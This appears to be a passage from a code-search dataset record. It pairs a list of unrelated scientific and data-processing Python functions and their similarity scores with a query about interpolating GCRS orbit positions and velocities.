np.array(self.data_df.rhavg)\n self.data_rhmax = np.array(self.data_df.rhmax)\n self.data_rhmin = np.array(self.data_df.rhmin)\n self.data_rs = np.array(self.data_df.rs)\n self.data_ws = np.array(self.data_df.ws)\n self.data_precip = np.array(self.data_df.precip)\n\n self.output_file_path = \"correction_files/\" + self.station_name + \"_output\" + \".xlsx\"", "def load_data(data_path, load_paths, month_year_start, month_year_end, \n day_start=None, day_end=None, verbose=False):\n \n # Load file containing GPS coordinates for blockfaces.\n with open(os.path.join(data_path, 'blockface_locs.p'), 'rb') as f:\n locations = pickle.load(f)\n \n # Load sheet containing blockface info about blockface operating times.\n block_info = pd.read_csv(os.path.join(data_path, 'block_info.csv'))\n keep_columns = ['ElementKey', 'PeakHourStart1', 'PeakHourEnd1', \n 'PeakHourStart2', 'PeakHourEnd2', 'PeakHourStart3', \n 'PeakHourEnd3', 'EffectiveStartDate', 'EffectiveEndDate']\n block_info = block_info[keep_columns]\n \n # Converting to datetime format for processing.\n for col in keep_columns:\n if 'Hour' in col:\n block_info.loc[:, col] = pd.to_datetime(block_info[col]).dt.time\n elif 'Date' in col:\n block_info.loc[:, col] = pd.to_datetime(block_info[col])\n else:\n pass\n \n # Loading holiday information for when paid parking is not available.\n cal = USFederalHolidayCalendar()\n holidays = cal.holidays(start='2012-01-01', end=datetime.datetime.now().date()).to_pydatetime()\n holidays = [hol.date() for hol in holidays]\n\n # Getting starting and ending date to keep data for.\n if day_start == None:\n day_start = 1\n if day_end == None:\n day_end = calendar.monthrange(month_year_end[1], month_year_end[0])[1]\n\n date_start = datetime.date(month_year_start[1], month_year_start[0], day_start)\n date_end = datetime.date(month_year_end[1], month_year_end[0], day_end)\n\n avg_loads = []\n gps_loc = []\n element_keys = []\n park_data = {}\n \n if isinstance(load_paths, list):\n pass\n else:\n load_paths = [load_paths]\n\n for load_path in load_paths:\n for fi in sorted(glob.glob(load_path + os.sep + '*.csv'), key=lambda fi: int(fi.split(os.sep)[-1].split('.')[0])):\n key = int(fi.split(os.sep)[-1].split('.')[0])\n\n block_data = pd.read_csv(fi, names=['Datetime', 'Load'])\n\n block_data['Datetime'] = pd.to_datetime(block_data['Datetime'])\n block_data.sort_values(by='Datetime', inplace=True)\n\n # Dropping days where the supply was 0 for this blockface.\n block_data.dropna(inplace=True)\n\n block_data['Date'] = block_data['Datetime'].dt.date\n block_data['Time'] = block_data['Datetime'].dt.time\n block_data['Day'] = block_data['Datetime'].dt.weekday\n block_data['Hour'] = block_data['Datetime'].dt.hour\n block_data['Minute'] = block_data['Datetime'].dt.minute\n\n # Keeping the data in the specified date range.\n block_data = block_data.loc[(block_data['Date'] >= date_start) & (block_data['Date'] <= date_end)]\n\n # Getting rid of Sunday since there is no paid parking.\n block_data = block_data.loc[block_data['Day'] != 6]\n\n # Dropping the days where the total parking is 0 because of holidays.\n block_data = block_data.loc[~block_data['Date'].isin(holidays)]\n block_data.reset_index(inplace=True, drop=True)\n\n # Clipping the loads to be no higher than 1.5\n block_data['Load'] = block_data['Load'].clip_upper(1.5)\n\n # If block contains no data, skip it.\n if len(block_data) == 0:\n if verbose:\n print('Skipping block %d because the supply is always 0.' % key)\n continue\n\n # If the block always has 0 occupancy, skip it.\n if len(block_data.loc[block_data['Load'] != 0]) == 0:\n if verbose:\n print('Skipping block %d because the occupancy is always 0.' % key)\n continue\n\n # Get GPS midpoint for block-face and skip if no information for it.\n if key in locations:\n curr_block = locations[key]\n\n lat1, lat2 = curr_block[1], curr_block[-2]\n lon1, lon2 = curr_block[0], curr_block[-3]\n\n mid_lat = (lat1 + lat2)/2.\n mid_long = (lon1 + lon2)/2.\n gps_loc.append([mid_lat, mid_long])\n else:\n if verbose:\n print('Skipping block %d because it was not found in locations.' % key)\n continue\n\n # Getting block-face info for the current key about hours of operation.\n curr_block_info = block_info.loc[block_info['ElementKey'] == key]\n\n # Filling times where paid parking is not allowed for the block with nan.\n for index, row in curr_block_info.iterrows():\n row_null = row.isnull()\n\n if not row_null['PeakHourStart1'] and not row_null['PeakHourStart2'] and not row_null['PeakHourStart3']:\n continue\n\n if not row_null['EffectiveEndDate']:\n row['EffectiveEndDate'] += datetime.timedelta(hours=23, minutes=59, seconds=59)\n\n if not row_null['PeakHourStart1']:\n\n start1 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart1']) for i in xrange(len(block_data))])\n end1 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd1']) for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask1 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start1 <= block_data['Datetime']) \n & (end1 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask1 = ((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start1 <= block_data['Datetime']) \n & (end1 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask1, 'Load'] = np.nan \n\n if not row_null['PeakHourStart2']:\n\n start2 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart2']) for i in xrange(len(block_data))])\n end2 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd2']) for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask2 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start2 <= block_data['Datetime']) \n & (end2 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask2 = ((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start2 <= block_data['Datetime']) \n & (end2 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask2, 'Load'] = np.nan \n\n if not row_null['PeakHourStart3']:\n\n start3 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart3'])\n for i in xrange(len(block_data))])\n end3 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd3'])\n for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask3 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start3 <= block_data['Datetime']) \n & (end3 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask3 = ((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start3 <= block_data['Datetime']) \n & (end3 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask3, 'Load'] = np.nan \n\n # Getting the average load for each hour of the week for the block.\n avg_load = block_data.groupby(['Day', 'Hour'])['Load'].mean().values.reshape((1,-1))\n\n # If there is not data skip it.\n if avg_load.shape != (1, 72):\n gps_loc.pop()\n continue\n\n avg_loads.append(avg_load)\n element_keys.append(key)\n park_data[key] = block_data\n \n # Each row has load and GPS locations for a block. Ordered as in element_keys.\n avg_loads = np.vstack((avg_loads))\n gps_loc = np.vstack((gps_loc))\n\n index = park_data[park_data.keys()[0]].groupby(['Day', 'Hour']).sum().index\n\n days = index.get_level_values(0).unique().values\n days = np.sort(days)\n\n hours = index.get_level_values(1).unique().values\n hours = np.sort(hours)\n\n idx_to_day_hour = {i*len(hours) + j:(days[i], hours[j]) for i in range(len(days)) \n for j in range(len(hours))}\n day_hour_to_idx = {v:k for k,v in idx_to_day_hour.items()}\n \n for key in park_data:\n park_data[key] = park_data[key].set_index('Datetime')\n\n # Merging the dataframes into multi-index dataframe.\n park_data = pd.concat(park_data.values(), keys=park_data.keys())\n\n park_data.index.names = ['ID', 'Datetime']\n\n # Making the first index the date, and the second the element key, sorted by date.\n park_data = park_data.swaplevel(0, 1).sort_index()\n\n return element_keys, avg_loads, gps_loc, park_data, idx_to_day_hour, day_hour_to_idx", "def get_data(self, date_time):\n id_columns = ','.join([col for col in self.table_primary_keys if col not in ['EFFECTIVEDATE', 'VERSIONNO']])\n return_columns = ','.join(self.table_columns)\n with self.con:\n cur = self.con.cursor()\n cur.execute(\"DROP TABLE IF EXISTS temp;\")\n cur.execute(\"DROP TABLE IF EXISTS temp2;\")\n cur.execute(\"DROP TABLE IF EXISTS temp3;\")\n cur.execute(\"DROP TABLE IF EXISTS temp4;\")\n # Store just the unique sets of ids that came into effect before the the datetime in a temporary table.\n query = \"\"\"CREATE TEMPORARY TABLE temp AS \n SELECT * \n FROM {table} \n WHERE EFFECTIVEDATE <= '{datetime}';\"\"\"\n cur.execute(query.format(table=self.table_name, datetime=date_time))\n # For each unique set of ids and effective dates get the latest versionno and sore in temporary table.\n query = \"\"\"CREATE TEMPORARY TABLE temp2 AS\n SELECT {id}, EFFECTIVEDATE, MAX(VERSIONNO) AS VERSIONNO\n FROM temp\n GROUP BY {id}, EFFECTIVEDATE;\"\"\"\n cur.execute(query.format(id=id_columns))\n # For each unique set of ids get the record with the most recent effective date.\n query = \"\"\"CREATE TEMPORARY TABLE temp3 as\n SELECT {id}, VERSIONNO, max(EFFECTIVEDATE) as EFFECTIVEDATE\n FROM temp2\n GROUP BY {id};\"\"\"\n cur.execute(query.format(id=id_columns))\n # Inner join the original table to the set of most recent effective dates and version no.\n query = \"\"\"CREATE TEMPORARY TABLE temp4 AS\n SELECT * \n FROM {table} \n INNER JOIN temp3 \n USING ({id}, VERSIONNO, EFFECTIVEDATE);\"\"\"\n cur.execute(query.format(table=self.table_name, id=id_columns))\n # Inner join the most recent data with the interconnectors used in the actual interval of interest.\n query = \"\"\"SELECT {cols} FROM temp4 ;\"\"\"\n query = query.format(cols=return_columns)\n data = pd.read_sql_query(query, con=self.con)\n return data", "def v_positions(self, date=yesterdayobj(), rendered=True):\n sdata = sorted(\n [\n (fob.name, fob.briefdailyreport(date).get(\"currentvalue\", 0))\n for fob in self.fundtradeobj\n ],\n key=lambda x: x[1],\n reverse=True,\n )\n pie = Pie()\n pie.add(\n series_name=\"总值占比\",\n data_pair=sdata,\n label_opts=opts.LabelOpts(is_show=False, position=\"center\"),\n ).set_global_opts(\n legend_opts=opts.LegendOpts(\n pos_left=\"left\", type_=\"scroll\", orient=\"vertical\"\n )\n ).set_series_opts(\n tooltip_opts=opts.TooltipOpts(\n trigger=\"item\", formatter=\"{a} <br/>{b}: {c} ({d}%)\"\n ),\n )\n\n if rendered:\n return pie.render_notebook()\n else:\n return pie", "def sun_single_day(date):\r\n\r\n\tsun = l.sun(date=date, local=True)\r\n\tsunrise = sun['sunrise']\r\n\tsunset = sun['sunset']\r\n\tday_length = str(sunset-sunrise)\r\n\tsolar_noon = l.solar_noon(date=date, local=True)\r\n\tsolar_zenith = l.solar_elevation(solar_noon.replace(tzinfo=None))\r\n\r\n\treturn {'sunrise':sunrise, 'sunset': sunset, 'daylength': day_length, 'solar_noon': solar_noon, 'zenith': solar_zenith}", "def precipitation(pre_date):\n # Query for the dates and temperature observations from the last year.\n # Convert the query results to a Dictionary using `date` as the key and `tobs` as the value.\n # Return the json representation of your dictionary.\n results = session.query(Measurement).filter(Measurement.date == pre_date)\n\n # Print all passengers of that gender\n all_tobs = [] \n for measure in results:\n measure_dict = {}\n measure_dict[\"station\"] = measure.station\n measure_dict[\"date\"] = measure.date\n measure_dict[\"prcp\"] = measure.prcp\n all_tobs.append(measure_dict)\n\n return jsonify(all_tobs)\n\n\n # print(results)\n # Convert list of tuples into normal list\n # all_names = list(np.ravel(results))\n # print(all_names)\n\n # print(all_names)\n return jsonify({'TempMin': tmp_min, 'TempMax': tmp_max, 'TempAvg': tmp_avg})", "def generate_portfolio_data(self):\n self.__load_portfolio_historical_prices()\n self.__populate_historical_trade_data()\n self.__calculate_portfolio_returns()\n self.__calculate_portfolio_performance()", "def _data():\n data = {s: {} for s in systems}\n\n # PbPb2760 and PbPb5020 dNch/deta\n for system, args, name in [\n ('PbPb2760', (880049, 1), 'D(N)/DETARAP'),\n ('PbPb5020', (1410589, 2),\n r'$\\mathrm{d}N_\\mathrm{ch}/\\mathrm{d}\\eta$'),\n ]:\n data[system]['dNch_deta'] = {None: HEPData(*args).dataset(name)}\n\n # PbPb2760 transverse energy\n # ignore bin 0-5 since it's redundant with 0-2.5 and 2.5-5\n dset = HEPData(1427723, 1).dataset('$E_{T}$', ignore_bins=[(0, 5)])\n dset['yerr']['sys'] = dset['yerr'].pop('sys,total')\n data['PbPb2760']['dET_deta'] = {None: dset}\n\n # PbPb2760 identified dN/dy and mean pT\n system = 'PbPb2760'\n\n for obs, table, combine_func in [\n ('dN_dy', 31, np.sum),\n ('mean_pT', 32, np.mean),\n ]:\n data[system][obs] = {}\n d = HEPData(1222333, table)\n for key, re_products in [\n ('pion', ['PI+', 'PI-']),\n ('kaon', ['K+', 'K-']),\n ('proton', ['P', 'PBAR']),\n ]:\n dsets = [\n d.dataset(RE='PB PB --> {} X'.format(i))\n for i in re_products\n ]\n\n data[system][obs][key] = dict(\n dsets[0],\n y=combine_func([d['y'] for d in dsets], axis=0),\n yerr={\n e: combine_func([d['yerr'][e] for d in dsets], axis=0)\n for e in dsets[0]['yerr']\n }\n )\n\n # PbPb2760 strange baryon yields\n data['PbPb2760']['dN_dy']['Lambda'] = HEPData(1243863, 23).dataset(\n RE='PB PB --> LAMBDA X'\n )\n\n d = HEPData(1243865, 11)\n for s in ['Xi', 'Omega']:\n data[system]['dN_dy'][s] = d.dataset(\n RE='PB PB --> ({0}- + {0}BAR+) X'.format(s.upper())\n )\n\n # PbPb2760 mean pT fluctuations\n d = HEPData(1307102, 6, reverse=True)\n name = r'$\\sqrt{C_m}/M(p_{\\rm T})_m$'\n # the table only has Npart, but they are actually 5% centrality bins\n width = 5.\n d.cent = [(n*width, (n+1)*width) for n, _ in enumerate(d.y(name))]\n data['PbPb2760']['pT_fluct'] = {None: d.dataset(name, maxcent=60)}\n\n # PbPb2760 and PbPb5020 flows\n for system, tables_nk in [\n ('PbPb5020', [\n (1, [(2, 2), (2, 4)]),\n (2, [(3, 2), (4, 2)]),\n ]),\n ('PbPb2760', [\n (3, [(2, 2), (2, 4)]),\n (4, [(3, 2), (4, 2)]),\n ]),\n ]:\n data[system]['vnk'] = {}\n\n for table, nk in tables_nk:\n d = HEPData(1419244, table)\n for n, k in nk:\n data[system]['vnk'][n, k] = d.dataset(\n 'V{}{{{}{}}}'.format(\n n, k, ', |DELTAETA|>1' if k == 2 else ''\n ),\n maxcent=(70 if n == 2 else 50)\n )\n\n # PbPb2760 central flows vn{2}\n system, obs = 'PbPb2760', 'vnk_central'\n data[system][obs] = {}\n\n for n, table, sys_err_frac in [(2, 11, .025), (3, 12, .040)]:\n dset = HEPData(900651, table).dataset()\n # the (unlabeled) errors in the dataset are actually stat\n dset['yerr']['stat'] = dset['yerr'].pop('sum')\n # sys error is not provided -- use estimated fractions\n dset['yerr']['sys'] = sys_err_frac * dset['y']\n data[system][obs][n, 2] = dset\n\n # PbPb2760 flow correlations\n for obs, table in [\n ('sc', 1),\n ('sc_normed', 2),\n ('sc_central', 3),\n ('sc_normed_central', 4)\n ]:\n d = HEPData(1452590, table)\n data['PbPb2760'][obs] = {\n mn: d.dataset('SC({},{})'.format(*mn))\n for mn in [(3, 2), (4, 2)]\n }\n\n return data", "def precipitation():\n\n # Query all Measurement\n prcp_results = session.query(Measurement).all()\n\n # Creating a dictionary and appending a list of Measurements to it\n all_prcp_results = []\n for prcp in prcp_results:\n prcp_dict = {}\n prcp_dict[\"date\"] = prcp.date\n prcp_dict[\"precipitation\"] = prcp.prcp\n all_prcp_results.append(prcp_dict)\n\n return jsonify(all_prcp_results)", "def process_data(self):\n logging.debug('process_data called')\n\n pd_time_series = pd.read_csv(f'{self.out_dir}docs/downloaded/'\n f'{self.filename}')\n\n pd_time_series = pd_time_series.drop('Lat', axis=1)\n pd_time_series = pd_time_series.drop('Long', axis=1)\n no_of_dates = len(pd_time_series.columns) - 2\n dateindex = pd.date_range(start='1-22-2020',\n periods=no_of_dates,\n freq='D').strftime('%d-%m')\n\n new_cols = ['Province/State', 'Country/Region']\n for index in dateindex:\n new_cols.append(index)\n pd_time_series.columns = new_cols\n\n pd_time_series = pd_time_series.drop('Province/State', axis=1)\n pd_edit_series = pd_time_series.set_index('Country/Region')\n\n pd_edit_series = pd_edit_series.T\n\n return pd_edit_series", "def get_nhc_forecast_dict(self, time):\n\n # Check to ensure the data source is HURDAT\n if self.source != \"hurdat\":\n raise RuntimeError(\n \"Error: NHC data can only be accessed when HURDAT is used as the data source.\")\n\n # Check to ensure storm is not an invest\n if self.invest:\n raise RuntimeError(\n \"Error: NHC does not issue advisories for invests that have not been designated as Potential Tropical Cyclones.\")\n\n # Get forecasts dict saved into storm object, if it hasn't been already\n try:\n self.forecast_dict\n except:\n self.get_operational_forecasts()\n\n # Get all NHC forecast entries\n nhc_forecasts = self.forecast_dict['OFCL']\n\n # Get list of all NHC forecast initializations\n nhc_forecast_init = [k for k in nhc_forecasts.keys()]\n\n # Find closest matching time to the provided forecast time\n nhc_forecast_init_dt = [dt.strptime(\n k, '%Y%m%d%H') for k in nhc_forecast_init]\n time_diff = np.array(\n [(i - time).days + (i - time).seconds / 86400 for i in nhc_forecast_init_dt])\n closest_idx = np.abs(time_diff).argmin()\n forecast_dict = nhc_forecasts[nhc_forecast_init[closest_idx]]\n if np.abs(time_diff[closest_idx]) >= 1.0:\n warnings.warn(\n f\"The time provided is outside of the duration of the storm. Returning the closest available NHC forecast.\")\n\n return forecast_dict", "def get_cape(temp,pres,dewpt,hght,startp,startt,startdp,totalcape=False): \n\n # Check units\n # Init temp is startt in C, Init dew point is stwrtdp,\n # pressure levels are in hPa \n temp = temp - 273.15 # convert temperature to celsius\n dewpt = dewpt - 273.15 # convert dewpoint to celsius\n pres = pres/100 # convert pressure to hPa\n \n \n inds = np.where( (pres < startp) ) \n tmp = pres[inds]\n del pres\n #pres = tmp[::-1]\n pres = tmp[:]\n del tmp \n startp = startp/100\n \n tmp = temp[inds]\n del temp\n #temp = tmp[::-1]\n temp = tmp[:]\n del tmp \n\n tmp = dewpt[inds]\n del dewpt\n #dewpt = tmp[::-1]\n dewpt = tmp[:]\n del tmp \n\n tmp = hght[inds]\n del hght\n #hght = tmp[::-1]\n hght = tmp[:]\n del tmp \n\n \n # Get Sub-LCL traces \n presdry,tempdry,tempiso=dry_ascent(startp,startt-degCtoK,startdp-degCtoK) \n \n\n # make lcl variables explicit\n P_lcl=presdry[-1]\n T_lcl=tempdry[-1]\n\n # Now lift a wet parcel from the intersection point\n # preswet=linspace(P_lcl,100,101)\n preswet,tempwet=moist_ascent(P_lcl,T_lcl)\n\n # tparcel is the concatenation of tempdry and \n # tempwet, and so on.\n \n tparcel=np.concatenate((tempdry,tempwet[1:]))\n pparcel=np.concatenate((presdry,preswet[1:]))\n\n # Interpolating the environmental profile onto the \n # parcel pressure coordinate\n # tempenv=interp(preswet,pres[::-1],temp[::-1])\n ## NEW, for total column:\n tempenv=interp(pparcel,pres[::-1],temp[::-1])\n\n\n # now solve for the equlibrium levels above LCL\n # (all of them, including unstable ones)\n # eqlev,stab=solve_eq(preswet[::-1],(tempwet-tempenv)[::-1])\n # NEW, for total column:\n # On second thought, we don't really want/need\n # any equilibrium levels below LCL\n # eqlev,stab=solve_eq(pparcel[::-1],(tparcel-tempenv)[::-1])\n # This is equivalent to the old statement :\n eqlev,stab=solve_eq(pparcel[pparcel<=P_lcl][::-1],\\\n (tparcel-tempenv)[pparcel<=P_lcl][::-1])\n\n aa = tparcel-tempenv\n\n # Sorting index by decreasing pressure\n I=np.argsort(eqlev)[::-1]\n eqlev=eqlev[I]; stab=stab[I]\n\n # temperatures at the equilibrium level\n # tempeq=interp(eqlev,preswet[::-1],tempenv[::-1])\n ## NEW, for total column:\n tempeq=interp(eqlev,pparcel[::-1],tparcel[::-1])\n\n # This helps with debugging\n # for ii,eq in enumerate(eqlev):\n # print \"%5.2f %5.2f %2d\"%(eq,tempeq[ii],stab[ii])\n\n # need environmental temperature at LCL\n tenv_lcl=interp(P_lcl,pparcel[::-1],tempenv[::-1])\n\n isstab=np.where(stab==1.,True,False)\n unstab=np.where(stab==1.,False,True) \n\n if eqlev.shape[0]==0:\n # no unstable layers in entire profile\n # because the parcel never crosses the tenv\n P_lfc=float('NaN')\n P_el=float('NaN')\n elif T_lcl>tenv_lcl:\n # check LCL to see if this is unstable\n P_lfc=P_lcl\n if totalcape:\n P_el=eqlev[isstab][-1]\n else:\n P_el=eqlev[isstab][0]\n elif eqlev.shape[0]>1:\n # Parcel is stable at LCL so LFC is the \n # first unstable equilibrium level and \n # \"EQ\" level is the first stable equilibrium \n # level\n P_lfc=eqlev[unstab][0]\n if totalcape:\n P_el=eqlev[isstab][-1]\n else:\n P_el=eqlev[isstab][0]\n else:\n # catch a problem... if there is only\n # one eqlev and it's stable (this is \n # unphysical), then it could be a vertical\n # resolution thing. This is a kind of \n # \"null\" option\n try:\n\t P_el=eqlev[isstab][0]\n P_lfc=eqlev[isstab][0]\n except:\n\t P_el=eqlev[unstab][0]\n P_lfc=eqlev[unstab][0]\t\n\t\n if np.isnan(P_lfc):\n return P_lcl,P_lfc,P_el,0,0\n\n # need to handle case where dwpt is not available \n # above a certain level for any reason. Most simplest \n # thing to do is set it to a reasonably low value; \n # this should be a conservative approach!\n \n #dwpt=dewpt.copy().soften_mask()\n [inds] = np.where(np.isnan(dewpt))\n dwpt = dewpt\n dwpt[inds] = dwpt.min()\n \n # raise ValueError\n #if dwpt[(pres>=P_el).data*(pres<P_lfc).data].mask.any():\n # print \"WARNING: substituting dwpt.min() for masked values of DWPT in this sounding\"\n #dwpt[dwpt.mask]=dwpt.min()\n # dwptenv=interp(preswet,pres[::-1],dwpt[::-1])\n # NEW:\n\n dwptenv=interp(pparcel,pres[::-1],dwpt[::-1])\n\n\n \n #if hght[(pres>=P_el).data].mask.any():\n # raise NotImplementedError, \"TODO: Implement standard atmosphere to substitute missing heights\"\n # hghtenv=interp(preswet,pres[::-1],self.soundingdata['hght'][::-1])\n # NEW:\n hghtenv=interp(pparcel,pres[::-1],hght[::-1])\n \n\n # Areas of POSITIVE Bouyancy\n # cond1=(tempwet>=tempenv)*(preswet<=P_lfc)*(preswet>P_el)\n # NEW:\n cond1=(tparcel>=tempenv)*(pparcel<=P_lfc)*(pparcel>P_el)\n # Areas of NEGATIVE Bouyancy\n # cond2=(tempwet<tempenv)*(preswet<=P_lcl)*(preswet>P_el)\n # NEW:\n if totalcape:\n cond2=(tparcel<tempenv)*(pparcel>P_el)\n else:\n cond2=(tparcel<tempenv)*(pparcel>P_lfc)\n # Do CAPE calculation\n # 1. Virtual temperature of parcel... remember it's saturated above LCL.\n # e_parcel=SatVap(tempwet)\n # Tv_parcel=VirtualTemp(tempwet+degCtoK,preswet*100.,e_parcel)\n # e_env=SatVap(dwptenv)\n # Tv_env=VirtualTemp(tempenv+degCtoK,preswet*100.,e_env)\n # NEW:\n e_parcel=SatVap(tparcel)\n Tv_parcel=VirtualTemp(tparcel+degCtoK,pparcel*100.,e_parcel)\n e_env=SatVap(dwptenv)\n Tv_env=VirtualTemp(tempenv+degCtoK,pparcel*100.,e_env)\n\n CAPE=trapz(9.81*(Tv_parcel[cond1]-Tv_env[cond1])/Tv_env[cond1],hghtenv[cond1])\n CIN=trapz(9.81*(Tv_parcel[cond2]-Tv_env[cond2])/Tv_env[cond2],hghtenv[cond2])\n\n return P_lcl,P_lfc,P_el,CAPE,CIN", "def process_data(self):\n timer_start = time.time()\n # ensure self.df_events and self.df_locations are not None\n if self.df_events is None or self.df_locations is None:\n print(\"Missing data: either df_events or df_locations is None\")\n return\n # set start and end based on self.df_events if not already set\n if not self.start:\n self.start = self.df_events['event_time'].min()\n if not self.end:\n self.end = self.df_events['event_time'].max()\n print(f\"date range for events data is from {self.start} to {self.end}\")\n # create Grid object before processing any data\n grid = self.compute_grid_cells(self.df_locations)\n # clean and combine events and locations data\n df_data = self.combine_events_and_locations(grid)\n print(df_data.shape)\n # df_data.to_csv('../../../data_files/20210506_cleanedInputDataCumSum.csv', index=False)\n # df_data = pd.read_csv('../../../data_files/20210415_cleanedInputDataAprilCumSum.csv')\n # process data within grid class\n df_processed = grid.process_data(df_data, 'weekly')\n # df_processed = self.calculate_demand(df_processed)\n # df_processed.to_csv('../../../data_files/20210506_processedGridCellData.csv')\n # set df_demand to be df_processed\n df_processed.reset_index(inplace=True)\n df_processed = df_processed.astype({'date': 'str', 'avail_count': 'float', 'avail_mins': 'float', 'prob_scooter_avail': 'float', 'trips': 'float', 'adj_trips': 'float'})\n # make sure dates are within start and end dates\n start_date = str(iso8601.parse_date(self.start).date())\n end_date = str(iso8601.parse_date(self.end).date())\n df_processed = df_processed[(df_processed['date'] >= start_date) & (df_processed['date'] <= end_date)]\n self.set_demand(df_processed)\n timer_end = time.time()\n print('Elapsed time to process data:', (timer_end - timer_start)/60.0, 'minutes')", "def coopsCurrentRequest(station_id, tides_dt_start, tides_dt_end):\n tides_data_options = \"time_zone=gmt&application=ports_screen&format=json\"\n tides_url = \"http://tidesandcurrents.noaa.gov/api/datagetter?\"\n begin_datetime = \"begin_date=\" + tides_dt_start\n end_datetime = \"&end_date=\" + tides_dt_end\n current_dp = \"&station=\" + station_id\n full_url = (tides_url + begin_datetime + end_datetime+current_dp +\n \"&application=web_services&product=currents&units=english&\" +\n tides_data_options)\n r = requests.get(full_url)\n try:\n r = r.json()\n except:\n return None\n if 'data' in r:\n r = r['data']\n data_dt = []\n data_spd = []\n data_dir = []\n for row in r:\n # Convert from knots to cm/s.\n data_spd.append(float(row['s']) * 51.4444444)\n data_dir.append(float(row['d']))\n date_time_val = datetime.strptime(row['t'], '%Y-%m-%d %H:%M')\n data_dt.append(date_time_val)\n\n data = dict()\n data['sea_water_speed (cm/s)'] = np.array(data_spd)\n data['direction_of_sea_water_velocity (degree)'] = np.array(data_dir)\n time = np.array(data_dt)\n columns = ['sea_water_speed (cm/s)',\n 'direction_of_sea_water_velocity (degree)']\n df = DataFrame(data=data, index=time, columns=columns)\n return df\n else:\n return None", "def parsec_des_stellar_params(dmod=0):\n isos = load_parsec_isochrones(\"DECAM\")\n g_Teff_funcs = {}\n g_logg_funcs = {}\n r_Teff_funcs = {}\n r_logg_funcs = {}\n gmr_Teff_funcs = {}\n gmr_logg_funcs = {}\n interp_kwargs = {\"bounds_error\":False,\"fill_value\":np.nan}\n for key in isos.keys():\n tab = isos[key]\n tab = tab[(tab[\"label\"]==2) | (tab[\"label\"]==3)]\n gmag, rmag = tab[\"gmag\"], tab[\"rmag\"]\n logT, logg = tab[\"logTe\"], tab[\"logg\"]\n Teff = 10**logT\n g_Teff_funcs[key] = interpolate.interp1d(gmag+dmod,Teff,**interp_kwargs)\n g_logg_funcs[key] = interpolate.interp1d(gmag+dmod,logg,**interp_kwargs)\n r_Teff_funcs[key] = interpolate.interp1d(rmag+dmod,Teff,**interp_kwargs)\n r_logg_funcs[key] = interpolate.interp1d(rmag+dmod,logg,**interp_kwargs)\n gmr_Teff_funcs[key] = interpolate.interp1d(gmag-rmag,Teff,**interp_kwargs)\n gmr_logg_funcs[key] = interpolate.interp1d(gmag-rmag,logg,**interp_kwargs)\n return g_Teff_funcs, g_logg_funcs, r_Teff_funcs, r_logg_funcs, gmr_Teff_funcs, gmr_logg_funcs" ]
[ "0.6184481", "0.5654636", "0.55653894", "0.55446994", "0.5504313", "0.5501529", "0.5354049", "0.5346375", "0.5329468", "0.5328793", "0.52968925", "0.52822536", "0.5271903", "0.5270245", "0.5265283", "0.526407", "0.52583337", "0.5231366", "0.5223594", "0.5191087", "0.5191087", "0.51416296", "0.5132494", "0.51254237", "0.5115953", "0.5073504", "0.5045307", "0.50206375", "0.5007385", "0.49920517", "0.4989483", "0.4984466", "0.49808556", "0.49788547", "0.49673855", "0.49579373", "0.49525464", "0.4947624", "0.49380323", "0.49380216", "0.49318022", "0.49181497", "0.49039176", "0.4903631", "0.49027076", "0.485398", "0.48526257", "0.4838471", "0.4837028", "0.48251295", "0.48235452", "0.4815193", "0.48023137", "0.4800928", "0.4797778", "0.47960785", "0.47942755", "0.4793541", "0.47873223", "0.47871366", "0.4785366", "0.47823954", "0.47770986", "0.4773814", "0.47693366", "0.47689047", "0.4764486", "0.47593048", "0.4747037", "0.47387305", "0.47374725", "0.47313452", "0.47267297", "0.4719923", "0.47166952", "0.47141254", "0.47045177", "0.4704341", "0.46980366", "0.4695906", "0.46928895", "0.46915746", "0.46821105", "0.4679085", "0.46752954", "0.46626523", "0.46613073", "0.4653227", "0.46513113", "0.46497217", "0.46357295", "0.46330258", "0.46241087", "0.46236995", "0.46235985", "0.46069026", "0.4602032", "0.45985863", "0.45966378", "0.4596094" ]
0.5595784
2
Computing initial values for position and velocity in GCRS system This is for later use in orbit integration, from tables in the prediction files. Use a lagrange polynomial in order to interpolate in the tables.
